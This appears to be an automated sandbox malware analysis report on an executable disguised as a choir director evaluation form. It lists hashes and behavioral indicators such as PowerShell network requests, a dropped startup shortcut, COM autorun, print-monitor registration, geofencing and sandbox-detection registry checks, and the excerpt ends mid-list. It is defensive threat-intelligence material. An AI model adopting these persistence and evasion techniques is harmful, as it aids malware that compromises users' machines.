Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-05-2021 06:20
Static task
static1
Behavioral task
behavioral1
Sample
Choir-Director-Evaluation-Form.exe
Resource
win7v20210408
General
-
Target
Choir-Director-Evaluation-Form.exe
-
Size
107.7MB
-
MD5
e4b18058271e4c9bfc7e3759a6132437
-
SHA1
70248c40ca94932a7f098a26ee7858bda5903d73
-
SHA256
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
-
SHA512
4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 43 3628 powershell.exe 45 2632 powershell.exe 54 1752 powershell.exe 55 4084 powershell.exe 56 3936 powershell.exe 45 2632 powershell.exe 43 3628 powershell.exe 54 1752 powershell.exe 56 3936 powershell.exe 55 4084 powershell.exe -
Executes dropped EXE 12 IoCs
Processes:
Choir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exePDFescapeDesktopInstaller.exews.exeupdater-ws.exeprinter-installer-app.execreator-app.execreator-ws.exeescape.exews.exeupdater-ws.exeescape.exepid process 2204 Choir-Director-Evaluation-Form.tmp 2916 PDFescape_Desktop_Installer.exe 3956 PDFescapeDesktopInstaller.exe 3148 ws.exe 5312 updater-ws.exe 8308 printer-installer-app.exe 4988 creator-app.exe 8864 creator-ws.exe 10824 escape.exe 13092 ws.exe 14664 updater-ws.exe 14488 escape.exe -
Registers new Print Monitor 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation PDFescape_Desktop_Installer.exe -
Drops startup file 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File created C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe -
Loads dropped DLL 64 IoCs
Processes:
Choir-Director-Evaluation-Form.tmpregsvr32.exeDllHost.exePDFescape_Desktop_Installer.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exews.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeprinter-installer-app.exespoolsv.execreator-app.execreator-ws.exeescape.exepid process 2204 Choir-Director-Evaluation-Form.tmp 2204 Choir-Director-Evaluation-Form.tmp 1008 regsvr32.exe 412 DllHost.exe 2916 PDFescape_Desktop_Installer.exe 15248 MsiExec.exe 15340 MsiExec.exe 15340 MsiExec.exe 15340 MsiExec.exe 15340 MsiExec.exe 15340 MsiExec.exe 4184 MsiExec.exe 4168 MsiExec.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 3148 ws.exe 5100 MsiExec.exe 5312 updater-ws.exe 5312 updater-ws.exe 5312 updater-ws.exe 5312 updater-ws.exe 5312 updater-ws.exe 5312 updater-ws.exe 5312 updater-ws.exe 14300 MsiExec.exe 14932 MsiExec.exe 6180 MsiExec.exe 1104 MsiExec.exe 5988 MsiExec.exe 7144 MsiExec.exe 7664 MsiExec.exe 8308 printer-installer-app.exe 1900 8420 spoolsv.exe 8420 spoolsv.exe 8420 spoolsv.exe 4988 creator-app.exe 4988 creator-app.exe 4988 creator-app.exe 4988 creator-app.exe 4988 creator-app.exe 8864 creator-ws.exe 8864 creator-ws.exe 8864 creator-ws.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe 10824 escape.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 11 IoCs
Processes:
spoolsv.exeprinter-installer-app.exemsiexec.exedescription ioc process File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\SysWOW64\msvcp140_2.dll msiexec.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfpmon_v.4.12.26.3.dll printer-installer-app.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\PDFescape Desktop\plugins\plugin-acroform.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-document-panel-signatures.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\draft.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeStandardEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UCS2-KSCpc-EUC msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\en\experimental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins-manager.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\pdfview.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\root-service-provider.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniCNS-UCS2-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJISX02132004-UTF32-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\experimental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Icons\file_attachment.graph.txt msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\CMap\Identity-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\NWP-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\it\information-only.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-scanner.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-Japan1-H-Mac msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\ETenms-B5-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\it\approved.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-compare-documents.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-CNS1-3 msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\CNS01-RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniGB-UTF32-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\preliminary-results.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-header-and-footer.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\ru\departmental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeLatin1Encoding msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\it\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\pt\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Templates\StickerNormal msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\GBT-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJIS2004-UTF8-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJISX0213-UTF32-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\for-comment.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\completed.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\ETen-B5-UCS2 msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniHojo-UTF8-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\as-is.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Icons\file_attachment.tag.txt msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-sign.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\Adobe-GB1-H-Host msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\GB-EUC-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UCS2-GBpc-EUC msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\GBT-H msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-edit-module.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\es\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\GB-RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\es\not-for-public-release.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\BusinessStamp\fr\departmental.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\ja\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJIS-UTF16-H msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\UniJISPro-UTF8-V msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\WP-Symbol msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-edit.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Icons\file_attachment.pushpin.txt msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\GB2312Encoding msiexec.exe File created C:\Program Files\PDFescape Desktop\sp\root\root.csp msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\ru\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\CMap\HK-RKSJ-H msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-service-provider.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\CMap\Identity-H msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\forms_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\secure_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\ocr_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\forms_icon msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\enterprise_icon msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\create_icon msiexec.exe File opened for modification C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\create_icon msiexec.exe File opened for modification C:\Windows\Installer\f74ec52.msi msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\enterprise_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\insert_icon msiexec.exe File opened for modification C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\forms_icon msiexec.exe File created C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\insert_icon msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\asian_icon msiexec.exe File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\edit_icon msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\review_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\uninstall_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\ocr_icon msiexec.exe File created C:\Windows\Installer\SourceHash{D81F9B76-24DE-4DFF-8869-B31289B36FAC} msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\main_icon msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\ocr_icon msiexec.exe File created C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\insert_icon msiexec.exe File created C:\Windows\Installer\f74ec4a.msi msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\convert_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\f74ec3d.msi msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\uninstall_icon msiexec.exe File created C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\insert_icon msiexec.exe File opened for modification C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\edit_icon msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\create_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\uninstall_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\insert_icon msiexec.exe File created C:\Windows\Installer\{42EF2557-7C52-40EE-81CF-B658B64C7095}\ocr_icon msiexec.exe File created C:\Windows\Installer\{00CEFC51-9626-4E7E-920B-4757DF0B9491}\insert_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\enterprise_icon msiexec.exe File opened for modification C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\ocr_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\convert_icon msiexec.exe File opened for modification C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\asian_icon msiexec.exe File created C:\Windows\Installer\{D81F9B76-24DE-4DFF-8869-B31289B36FAC}\enterprise_icon msiexec.exe File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\install_icon msiexec.exe File created C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\secure_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\enterprise_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\enterprise_icon msiexec.exe File created C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\ocr_icon msiexec.exe File opened for modification C:\Windows\Installer\{CC6DC81A-06C1-4933-8117-794710375AD3}\enterprise_icon msiexec.exe File created C:\Windows\Installer\{87391E47-A919-4E89-8D07-EA259AD63DB8}\ocr_icon msiexec.exe File created C:\Windows\Installer\{B9EB4384-5195-4ED6-BAB0-661FC5B36E14}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{8B686E57-76A7-4330-A981-4AB69DF7A568}\convert_icon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exespoolsv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened 